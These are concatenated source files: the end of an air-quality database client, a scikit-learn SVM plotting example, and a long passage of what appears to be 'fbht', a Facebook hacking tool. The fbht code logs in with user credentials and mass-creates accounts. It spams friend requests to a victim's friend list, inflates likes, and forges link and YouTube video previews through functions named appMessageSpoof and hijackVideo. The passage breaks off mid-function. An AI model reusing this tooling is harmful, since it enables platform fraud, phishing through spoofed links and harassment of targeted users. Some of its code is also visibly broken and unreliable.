        INNER JOIN groupe_atmo g ON (i.nom_court_grp=g.nom_court_grp)
        INNER JOIN nom_mesure n ON (ssi.nopol=n.nopol)
        WHERE g.nom_agglo='{2}'
        AND i.j_date BETWEEN
        TO_DATE('{3}', 'YYYY-MM-DD') AND
        TO_DATE('{4}', 'YYYY-MM-DD')
        GROUP BY
        g.nom_agglo,
        i.j_date
        ORDER BY i.j_date""".format(i_str, ssi_str, reseau, debut, fin)
        df = psql.read_sql(_sql, self.conn)
        df = df.set_index(['reseau', 'date'])
        return df

    def get_sqltext(self, format_=1):
        """Return the queries currently running on the server."""
        if format_ == 1:
            _sql = """SELECT u.sid, substr(u.username,1,12) user_name, s.sql_text
            FROM v$sql s,v$session u
            WHERE s.hash_value = u.sql_hash_value
            AND sql_text NOT LIKE '%from v$sql s, v$session u%'
            AND u.username NOT LIKE 'None'
            ORDER BY u.sid"""
        if format_ == 2:
            _sql = """SELECT u.username, s.first_load_time, s.executions, s.sql_text
            FROM dba_users u,v$sqlarea s
            WHERE u.user_id=s.parsing_user_id
            AND u.username LIKE 'LIONEL'
            AND sql_text NOT LIKE '%FROM dba_users u,v$sqlarea s%'
            ORDER BY s.first_load_time"""
        return psql.read_sql(_sql, self.conn)
if __name__ == "__main__":
    # Interactive smoke test: connect, list the OZONE network measurements
    # and fetch one year of hourly data.
    u = input("Enter your XAIR user name: ")
    p = input("Enter your XAIR password: ")
    a = input("Enter your XAIR database adress: ")
    xr = XAIR(user=u, pwd=p, adr=a)
    mes = xr.liste_mesures(reseau='OZONE').MESURE
    a = xr.get_mesures(mes, '2012-01-01', fin='2012-12-31', freq='H', brut=False)
| mit |
ilo10/scikit-learn | examples/svm/plot_iris.py | 225 | 3252 | """
==================================================
Plot different SVM classifiers in the iris dataset
==================================================
Comparison of different linear SVM classifiers on a 2D projection of the iris
dataset. We only consider the first 2 features of this dataset:
- Sepal length
- Sepal width
This example shows how to plot the decision surface for four SVM classifiers
with different kernels.
The linear models ``LinearSVC()`` and ``SVC(kernel='linear')`` yield slightly
different decision boundaries. This can be a consequence of the following
differences:
- ``LinearSVC`` minimizes the squared hinge loss while ``SVC`` minimizes the
regular hinge loss.
- ``LinearSVC`` uses the One-vs-All (also known as One-vs-Rest) multiclass
reduction while ``SVC`` uses the One-vs-One multiclass reduction.
Both linear models have linear decision boundaries (intersecting hyperplanes)
while the non-linear kernel models (polynomial or Gaussian RBF) have more
flexible non-linear decision boundaries with shapes that depend on the kind of
kernel and its parameters.
.. NOTE:: while plotting the decision function of classifiers for toy 2D
datasets can help get an intuitive understanding of their respective
expressive power, be aware that those intuitions don't always generalize to
more realistic high-dimensional problems.
"""
print(__doc__)

import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets

# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2]  # we only take the first two features. We could
                      # avoid this ugly slicing by using a two-dim dataset
y = iris.target
h = .02  # step size in the mesh

# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0  # SVM regularization parameter
svc = svm.SVC(kernel='linear', C=C).fit(X, y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, y)
lin_svc = svm.LinearSVC(C=C).fit(X, y)

# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
                     np.arange(y_min, y_max, h))

# title for the plots
titles = ['SVC with linear kernel',
          'LinearSVC (linear kernel)',
          'SVC with RBF kernel',
          'SVC with polynomial (degree 3) kernel']

# One subplot per classifier, each showing its decision regions.
for i, clf in enumerate((svc, lin_svc, rbf_svc, poly_svc)):
    # Plot the decision boundary. For that, we will assign a color to each
    # point in the mesh [x_min, m_max]x[y_min, y_max].
    plt.subplot(2, 2, i + 1)
    plt.subplots_adjust(wspace=0.4, hspace=0.4)
    # Predict the class of every mesh point to color the background.
    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
    # Put the result into a color plot
    Z = Z.reshape(xx.shape)
    plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
    # Plot also the training points
    plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Paired)
    plt.xlabel('Sepal length')
    plt.ylabel('Sepal width')
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(())
    plt.yticks(())
    plt.title(titles[i])

plt.show()
| bsd-3-clause |
Loke155/fbht | mainFunc.py | 4 | 126869 | import sys,os
from platform import system
from getpass import getpass
from mainLib import *
import MyParser
from urllib import urlencode
import simplejson as json
import database
from time import time,ctime,sleep
import pickle
import re
from handlers import *
import signal
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import community
from networkx.drawing.nx_agraph import write_dot
from base64 import b64encode
import logging
from mechanize import Request
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import datetime
# Module-wide state shared by the functions below.
blocked = 0  # flipped to 1 by login() when Facebook's checkpoint page is detected
masterCj = ''  # NOTE(review): appears unused in this chunk; verify before removing
def flush():
    """Force a stdout flush on Linux so '\\r' progress lines appear."""
    if system() != 'Linux':
        return
    sys.stdout.flush()
def setGlobalLogginng():
    """Toggle the module-wide verbose-logging flag and pause for the user.

    NOTE(review): the name keeps its original misspelling because external
    callers may reference it.  Assumes ``globalLogging`` is defined at
    module level elsewhere in this file — confirm.
    """
    global globalLogging
    globalLogging = not globalLogging
    message = 'logging level set to %s' %globalLogging
    logs(message)
    raw_input(message + ' Press enter to continue')
def setMail():
    """Interactively prompt for Facebook credentials.

    The password prompt is hidden via getpass.  Returns (email, password).
    """
    address = raw_input("Enter the email: ")
    secret = getpass("Enter the Password: ")
    return address, secret
def login(email, password,state):
    """Log into Facebook through a Selenium-driven Firefox and capture cookies.

    email/password: credentials to submit on the login form.
    state: 'real' for the operator's own account, anything else for a test
        account (only test-account cookies are appended to cookieArray).

    Side effects: clears and refills the global cookie jar ``cj``, dumps the
    raw cookies to cookies.pkl, may set the global ``blocked`` flag, and
    appends to the global ``cookieArray``.  Returns -1 on failure, None on
    success.
    """
    global blocked
    cookieHandler = customCookies()
    # Empty the cookies
    cj.clear()
    # Access the login page to get the forms
    driver = webdriver.Firefox()
    driver.get("https://www.facebook.com/")
    assert "Facebook" in driver.title
    elem = driver.find_element_by_name("email")
    elem.send_keys(email)
    elem = driver.find_element_by_name("pass")
    elem.send_keys(password)
    elem.send_keys(Keys.RETURN)
    all_cookies = driver.get_cookies()
    pickle.dump( driver.get_cookies() , open("cookies.pkl","wb"))
    assert "No results found." not in driver.page_source
    driver.close()
    # Copy the browser cookies into the mechanize-compatible jar.
    for s_cookie in all_cookies:
        cj.set_cookie(cookielib.Cookie(version = 0, name = s_cookie['name'], value = s_cookie['value'], port = '80', port_specified = False, domain = s_cookie['domain'], domain_specified = True, domain_initial_dot = False, path = s_cookie['path'], path_specified = True, secure = s_cookie['secure'], expires = s_cookie['expiry'], discard = False, comment = None, comment_url = None, rest = None, rfc2109 = False))
    try:
        if cookieHandler.isLogged(cj) == True:
            # Checkpoint exists (?)
            if cookieHandler.checkPoint(cj) == True:
                blocked = 1
                print 'Error - Checkpoint reached, your account may be blocked'
                return -1
            # Assign cookies to array
            if state != 'real':
                cookieArray.append(cj._cookies)
        else:
            logs('Logging failed')
            print '\rLogging failed, check credentials and try again\r'
            return -1
    except signalCaught as e:
        # On interruption, clean up the created test users before leaving.
        deleteUser(10)
        message = '%s catch from login' %e.args[0]
        logs(str(message))
        print '%s \n' %message
        raw_input('Press enter to continue')
    return
def set_dtsg():
    """Fetch the Facebook home page and return the anti-CSRF fb_dtsg token.

    The actual extraction is delegated to workarounddtsg(); this function
    mainly warms the session and logs the raw response when verbose
    logging is on.  Uses the global mechanize browser ``br``.
    """
    n = 0
    flag = False
    try:
        response = br.open('https://www.facebook.com/')
        ''' Old dtsg set module..
        for form in br.forms():
            for control in form.controls:
                if control.name == 'fb_dtsg':
                    flag = True
                    break
            n += 1
            if flag: break
        br.select_form(nr=n-1) '''
        if globalLogging:
            logs(response.read())
    except mechanize.HTTPError as e:
        logs(e.code)
        print e.code
    except mechanize.URLError as e:
        logs(e.reason.args)
        print e.reason.args
    except:
        logs('Error in the dtsg set module')
    print '\rTrying to set dtsg \r'
    return workarounddtsg()
def workarounddtsg():
    """Scrape the fb_dtsg token out of the raw Facebook home-page HTML.

    Locates the first occurrence of "fb_dtsg", then the next value="..."
    attribute after it, and returns the quoted value.  Returns 0 on any
    failure (callers compare against 0).

    NOTE(review): the bare except also swallows unrelated errors (including
    the tool's signal exceptions) — confirm that is intended.
    """
    try:
        response = br.open('https://www.facebook.com/')
        parse = response.read()
        match = re.search("\"fb_dtsg\"", parse)
        matchBis = re.search("value=\"",parse[match.end():])
        matchBisBis = re.search("\"",parse[match.end()+matchBis.end():])
        fb_dtsg = parse[match.end()+matchBis.end():match.end()+matchBis.end()+matchBisBis.start()]
        return fb_dtsg
    except:
        print 'error'
        return 0
def getC_user():
    # Get the c_user value from the cookie
    # Filter the global cookie jar for the logged-in user's numeric id.
    # NOTE(review): if no 'c_user' cookie exists this raises
    # UnboundLocalError on the return line — confirm callers always run
    # after a successful login.
    for cookie in cj:
        if (cookie.name == 'c_user'):
            c_user = cookie.value
    return str(c_user)
def createUser(number):
    """Create ``number`` Facebook whitehat test users, one per minute.

    Posts to the whitehat create_test_user endpoint with the session's
    fb_dtsg token, collecting each raw response; the responses are then
    handed to MyParser.parseData, whose flag is returned.  Progress is
    printed in place with '\\r'.
    """
    fb_dtsg = set_dtsg()
    if (fb_dtsg == 0):
        print 'ERROR MOTHER FUCKER -_-'
    c_user = getC_user()
    arguments = {
        '__user' : c_user,
        '__a' : '1',
        '__dyn' : '798aD5z5zufEa0',
        '__req' : '4',
        'fb_dtsg' : fb_dtsg,
        'phstamp' : '16581655751108754574',
    }
    datos = urlencode(arguments)
    userRaw = []
    percentage = 0.0
    print 'Creating Test Users .. '
    for i in range(int(number)):
        try:
            response = br.open('https://www.facebook.com/ajax/whitehat/create_test_user.php',datos)
            userRaw.append(str(response.read()))
            percentage = (i * 100.0) / int(number)
            flush()
            print '\rCompleted [%.2f%%]\r'%percentage,
            # Throttle to one creation per minute to avoid rate limiting.
            sleep(60)
        except mechanize.HTTPError as e:
            logs(str(e.code) + ' on iteration ' + str(i))
            print str(e.code) + ' on iteration %d'%i
        except mechanize.URLError as e:
            logs(str(e.reason.args) + ' on iteration ' + str(i))
            print str(e.reason.args) + ' on iteration %d'%i
        except signalCaught as e:
            # Re-raise so the interactive handler can clean up.
            raise signalCaught(str(e.args[0])+' handling from createUser.. ')
        except:
            logs('Error in create module on iteration ' + str(i))
            print '\r \r',
            print '\rError in create module on iteration %d\r' %i,
    fullFlag = MyParser.parseData(userRaw)
    return fullFlag
# NOTE(review): legacy implementation kept as an inert module-level string
# literal (dead code); superseded by deleteUser(appId) defined below.
'''
def deleteUser():
    #Number is the max amount of test user accounts - Modify this value if the platform change
    number = 10
    itemNum = 0
    users = []
    ids = []
    try:
        request = br.open("https://www.facebook.com/whitehat/accounts/")
    except mechanize.HTTPError as e:
        logs(str(e.code) + ' on deleteUser module')
        print str(e.code) + ' on deleteUser module'
    except mechanize.URLError as e:
        logs(str(e.reason.args) + ' on deleteUser module')
        print str(e.reason.args) + ' on deleteUser module'
    i = 0
    for form in br.forms():
        try:
            form.find_control('selected_test_users[]').items
            br.select_form(nr=i)
            break
        except:
            i += 1
            continue
    try:
        for item in br.form.find_control('selected_test_users[]').items:
            users.append(item.name)
            br.form.find_control('selected_test_users[]').items[itemNum].selected = True
            itemNum += 1
        string = list(br.forms())[1]['fb_dtsg']
        i = 0
        dictioUser = {'fb_dtsg':str(string)}
        for parameters in users:
            if (i <= number):
                dictioUser['selected_test_users['+str(i)+']'] = parameters
                i += 1
        for elements in dictioUser:
            ids.append(str(dictioUser[str(elements)]))
        dictioUser['__user'] = str(getC_user())
        dictioUser['__a'] = '1'
        dictioUser['__dyn'] = '7n8ahyj35zolgDxqihXzA'
        dictioUser['__req'] = 'a'
        dictioUser['phstamp'] = '1658168991161218151159'
        datos = urlencode(dictioUser)
        response = br.open('https://www.facebook.com/ajax/whitehat/delete_test_users.php',datos)
        if globalLogging:
            logs(request.read())
            logs(response.read())
    except:
        logs('No users for eliminate')
        print '\rNo users for eliminate\r'
'''
def deleteUser(appId):
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'__user' : str(getC_user()),
'__a' : '1',
'__dyn' : '7w86i3S2e4oK4pomXWo5O12wYw',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581718683108776783808786',
'__rev' : '1409158'
}
testUserID = database.getUsers()
for n in len(testUserID[0]):
arguments['test_user_ids['+str(n)+']'] = str(testUserID[0][n])
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/async/test-users/delete/?app_id='+appId,datos)
if globalLogging:
logs(response.read())
except:
logs('Error deleting users')
print 'Error deleting users \n'
def massLogin():
    """Log every not-yet-logged test account in, pruning the failures.

    Iterates the rows from database.getUsersNotLogged() (row[0]=email,
    row[3]=password — presumably; confirm against the database schema),
    printing in-place progress.  Accounts whose login returns -1 are
    removed from the database.  Persists cookies before and after.
    """
    i = int(0)
    people = database.getUsersNotLogged()
    # Flush the progress line.
    print '\r \r',
    loadPersistentCookie()
    for person in people:
        # login
        rsp = login(str(person[0]),str(person[3]),'test')
        # percentage
        i+=1
        percentage = (i * 100.0) / len(people)
        flush()
        print '\rCompleted [%.2f%%]\r'%percentage,
        if rsp == -1:
            database.removeTestUsers(person[0])
    savePersistentCookie()
def friendshipRequest():
if (len(cookieArray) == 1):
massLogin()
userID = database.getUsers()
for cookies in range(len(cookieArray)):
cj._cookies = cookieArray[cookies]
c_user = getC_user()
users = 0
for person in userID:
'''---------------------Comienza el envio de solicitudes ... ----------------------- '''
if users > cookies:
sendRequest(person[0],c_user)
users += 1
def sendRequest(userID,c_user):
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'to_friend' : userID,
'action' : 'add_friend',
'how_found' : 'profile_button',
'ref_param' : 'none',
'link_data[gt][profile_owner]' : userID,
'link_data[gt][ref]' : 'timeline:timeline',
'outgoing_id' : '',
'logging_location' : '',
'no_flyout_on_click' : 'true',
'ego_log_data' : '',
'http_referer' : '',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'n',
'fb_dtsg' : fb_dtsg,
'phstamp' : '1658165688376111103320'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/add_friend/action.php',datos)
if globalLogging:
logs(response.read())
print 'Friend Request sent from %s to %s! \n' %(c_user,userID)
except:
logs('Error sending request ')
print 'Error sending request \n'
def sendRequestToList(victim):
root = 'dumps'
directory = victim
friends = []
frieds_send = []
count = 0
number = raw_input('Insert the amount of requests to send: ')
try:
try:
persons = open( os.path.join(root,directory,victim+".txt"),"rb" )
except:
logs('Friend file not found')
print 'Friend file not found'
return
try:
persons_send = open( os.path.join(root,directory,victim+"_friend_send.txt"),"rb")
while True:
linea = persons_send.readline()
if not linea:
break
frieds_send.append(linea.strip("\n\r"))
persons_send.close()
persons_send = open(os.path.join(root,directory,victim+"_friend_send.txt"),"ab")
except:
persons_send = open(os.path.join(root,directory,victim+"_friend_send.txt"),"wb")
while True:
linea = persons.readline()
if not linea:
break
friends.append(linea.strip("\n\r"))
i = 0.0
percentage = 0.0
print 'Sending friend requests'
for userID in friends:
if userID not in frieds_send:
#Escape condition
if count > int(number):
persons_send.close()
return
count += 1
''' Selects the fb_dtsg form '''
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'to_friend' : userID,
'action' : 'add_friend',
'how_found' : 'profile_button',
'ref_param' : 'none',
'link_data[gt][profile_owner]' : userID,
'link_data[gt][ref]' : 'timeline:timeline',
'outgoing_id' : '',
'logging_location' : '',
'no_flyout_on_click' : 'true',
'ego_log_data' : '',
'http_referer' : '',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'n',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265817211599516953787450107',
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/add_friend/action.php',datos)
#percentage
percentage = (i * 100.0) / len(friends)
i+=1
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
if globalLogging:
logs(response.read())
print 'Friend Request sent from %s to %s! \n' %(c_user,userID)
persons_send.write(userID+'\n')
except:
logs('Error sending request ')
print 'Error sending request \n'
except signalCaught as e:
message = '%s catch from send request module' %e.args[0]
logs(str(message))
print '%s \n' %message
persons_send.close()
raw_input('Press enter to continue')
return
def acceptRequest():
initAccept()
acceptIDS = MyParser.parsePending()
while len(acceptIDS) != 0:
for elements in acceptIDS:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'action' : 'confirm',
'id' : elements,
'ref' : '%2Freqs.php',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8aD5z5zu',
'__req' : 'm',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816867997811675120'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/requests/friends/ajax/ ',datos)
if globalLogging:
logs(response.read())
print 'Accept done! \n'
initAccept()
acceptIDS = MyParser.parsePending()
def initAccept():
f = open("respuesta.html","wb")
response = br.open('https://www.facebook.com/friends/requests/')
''' Se guarda el output de la respuesta html para ser parseada y filtrar los ID's '''
f.write(response.read())
f.close()
def savePersistentCookie():
f = open("cookiesObject","wb")
pickle.dump(cookieArray,f)
f.close()
for element in cookieArray:
cj._cookies = element
for cookie in cj:
if (cookie.name == 'c_user'):
c_user = cookie.value
database.setLogged(c_user)
def loadPersistentCookie():
global cookieArray
try:
f = open("cookiesObject","r")
cookieArray = pickle.load(f)
i = 0
''' Se limpian las cookies que no sirven - se filtra el id para cambiar su estado a logged = 0 '''
for cookie in cookieArray:
cj._cookies = cookie
for element in cj:
if (element.name == 'checkpoint'):
strip = str(element.value).strip("%7B%22u%22%3A")
removeId = strip.split("%2C%22t%22%3A")[0]
database.setLoggedOut(removeId)
del cookieArray[i]
i+=1
except:
return
def deleteAccounts():
people = database.getUsers()
for person in people:
database.removeTestUsers(person[0])
cookieArray[:] = []
def like(postId, quantity):
signal.signal(signal.SIGINT, signal_handler)
try:
email,password = setMail()
if (login(email,password,'real') is not -1):
#Cookie of the real account
masterCookie = cj._cookies
times = int(quantity) / 10
for i in range(times):
cj._cookies = masterCookie
#Check if users already exists
if ( createUser(10) == -1 ):
#Delete existing users and re-execute the create module
deleteUser()
deleteAccounts()
createUser(10)
massLogin()
#Percentage container
percentage = 0.0
j = 0.0
total = len(cookieArray) * len(postId)
#flush
print '\r \r',
for i in range(len(cookieArray)):
for post in range(len(postId)):
cj._cookies = cookieArray[i]
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'like_action' : 'true',
'ft_ent_identifier' : str(postId[post]),
'source' : '0',
'client_id' : str(c_user)+'%3A4047576437',
'rootid' : 'u_0_2o',
'giftoccasion' : '',
'ft[tn]' : '%3E%3D',
'ft[type]' : '20',
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ahyj35ym3KiA',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816595797611370260',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/ufi/like.php',datos)
if globalLogging:
logs(response.read())
percentage = (j * 100.0)/total
flush()
print '\r[%.2f%%] of likes completed\r' %(percentage),
j+=1
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Unknown error'
cj._cookies = masterCookie
deleteUser()
deleteAccounts()
raw_input('Finished like() module, press enter to continue')
except signalCaught as e:
deleteUser()
message = '%s catch from create module' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def appMessageSpoof(appId,link,picture,title,domain,description,comment):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : br.form['fb_dtsg'],
'preview' : '0',
'_path' : 'feed',
'app_id' : int(appId),
'redirect_uri' : 'https://facebook.com',
'display' : 'page',
'link' : str(link),
'picture' : str(picture),
'name' : str(title),
'caption' : str(domain),
'description' : str(description),
'from_post' : '1',
'feedform_user_message' : str(comment),
'publish' : 'Share',
'audience[0][value]' : '80',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/dialog/feed',datos)
if globalLogging:
logs(response.read())
except:
logs('Error en el modulo de appMessageSpoof()')
print 'Error en el modulo de appMessageSpoof()\n'
def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID, privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : fb_dtsg,
'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42',
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_29',
'xhpc_targetid' : str(c_user),
'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : u_0_2n , version : x , parent_fbid :'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(videoLink),
'attachment[params][urlInfo][final]' : str(videoLink),
'attachment[params][urlInfo][user]' : str(link),
'attachment[params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : 'http://i2.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og',
'attachment[params][medium]' : '103',
'attachment[params][url]' : str(videoLink),
'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
'attachment[params][video][0][src]' : 'http://www.youtube.com/v/FxyecjOQXnI?autohide=1&version=3&autoplay=1',
'attachment[params][video][0][width]' : '1280',
'attachment[params][video][0][height]' : '720',
'attachment[params][video][0][safe]' : '1',
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : 'www.youtube.com',
'link_metrics[base_domain]' : 'youtube.com',
'link_metrics[title_len]' : '92',
'link_metrics[summary_len]' : '160',
'link_metrics[min_dimensions][0]' : '70',
'link_metrics[min_dimensions][1]' : '70',
'link_metrics[images_with_dimensions]' : '1',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '1280',
'link_metrics[image_dimensions][1]' : '720',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '1',
'link_metrics[images_cap]' : '10',
'link_metrics[images_type]' : 'images_array',
'composer_metrics[best_image_w]' : '398',
'composer_metrics[best_image_h]' : '208',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '1058',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1394761251',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : privacy,
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm',
'__req' : 'm',
'ttstamp' : '26581658074898653',
'__rev' : '1161243',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de linkPreviewYoutube()')
print 'Error en el modulo de linkPreviewYoutube()\n'
def linkPreview(link,realLink,title,summary,comment,image,privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'composer_session_id' : '787d2fec-b5c1-41fe-bbda-3450a03240c6',
'fb_dtsg' : fb_dtsg,
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_29',
'xhpc_targetid' : str(c_user),
'clp' : '{"cl_impid":"27c5e963","clearcounter":0,"elementid":"u_0_2n","version":"x","parent_fbid":'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(realLink),
'attachment[params][urlInfo][final]' : str(realLink),
'attachment[params][urlInfo][user]' : str(link),
'attachment[params][favicon]' : str(realLink)+'/images/favicon.ico',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : str(image),
'attachment[params][medium]' : '106',
'attachment[params][url]' : str(realLink),
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : str(realLink),
'link_metrics[base_domain]' : str(realLink),
'link_metrics[title_len]' : '38',
'link_metrics[summary_len]' : '38',
'link_metrics[min_dimensions][0]' : '70',
'link_metrics[min_dimensions][1]' : '70',
'link_metrics[images_with_dimensions]' : '3',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '322',
'link_metrics[image_dimensions][1]' : '70',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '5',
'link_metrics[images_cap]' : '3',
'link_metrics[images_type]' : 'ranked',
'composer_metrics[best_image_w]' : '100',
'composer_metrics[best_image_h]' : '100',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '812',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1394765332',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : privacy,
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm',
'__req' : 'h',
'ttstamp' : '26581658074898653',
'__rev' : '1161243'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de linkPreview()')
print 'Error en el modulo de linkPreview()\n'
def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo,privacy):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'composer_session_id' : '8c4e1fa6-5f1f-4c16-b393-5c1ab4c3802b',
'fb_dtsg' : fb_dtsg,
'xhpc_context' : 'profile',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '1',
'xhpc_composerid' : 'u_0_23',
'xhpc_targetid' : str(c_user),
'clp' : '{"cl_impid":"4b4a8369","clearcounter":0,"elementid":"u_0_2h","version":"x","parent_fbid":'+str(c_user)+'}',
'xhpc_message_text' : str(comment),
'xhpc_message' : str(comment),
'aktion' : 'post',
'app_id' : '2309869772',
'attachment[params][urlInfo][canonical]' : str(videoLink),
'attachment[params][urlInfo][final]' : str(videoLink),
'attachment[params][urlInfo][user]' : str(videoLink),
'attachment[params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'attachment[params][title]' : str(title),
'attachment[params][summary]' : str(summary),
'attachment[params][images][0]' : 'http://i2.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og',
'attachment[params][medium]' : '103',
'attachment[params][url]' : str(videoLink),
'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
'attachment[params][video][0][src]' : 'http://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
